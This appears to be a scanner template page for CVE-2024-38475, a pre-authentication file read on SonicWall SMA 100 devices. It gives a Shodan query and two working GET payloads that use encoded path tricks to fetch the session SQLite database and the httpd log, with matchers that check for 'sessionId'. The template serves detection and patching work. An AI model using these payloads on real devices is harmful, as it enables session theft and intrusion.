Sonicwall - Pre-Authentication Arbitrary File Read
CVE-2024-38475
Verified
Description
Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
Severity
Critical
CVSS Score
9.1
Exploit Probability
94%
Published Date
May 2, 2025
Template Author
shaikhyaser
CVE-2024-38475.yaml
id: CVE-2024-38475
info:
name: Sonicwall - Pre-Authentication Arbitrary File Read
author: shaikhyaser
severity: critical
description: |
Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
reference:
- https://github.com/watchtowrlabs/watchTowr-vs-SonicWall-PreAuth-RCE-Chain/blob/main/watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py
- https://labs.watchtowr.com/sonicboom-from-stolen-tokens-to-remote-shells-sonicwall-sma100-cve-2023-44221-cve-2024-38475/
- https://nvd.nist.gov/vuln/detail/CVE-2024-38475
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-38475
cwe-id: CWE-116
epss-score: 0.9375
epss-percentile: 0.99841
metadata:
verified: true
max-request: 1
shodan-query: html:"SonicWall" html:"SMA"
tags: cve,cve2024,sonicwal,sma-100,lfi,kev,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/tmp/temp.db%3f.1.1.1.1a-1.css"
- "{{BaseURL}}/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css"
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains_all(body, "SQLite format","sessionId")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains_all(body, "mod_antiloris","[pid")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022016c710e672299f2ed96a1c39a89e2173675009834232e3b935206b075adf7807022100c99ec3933abcbf04e2631732d2f27e3dd278affa252e25ec880eda638f687dd9:922c64590222798bb761d5b6d8e729509.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVE ID:
cve-2024-38475
CWE ID:
cwe-116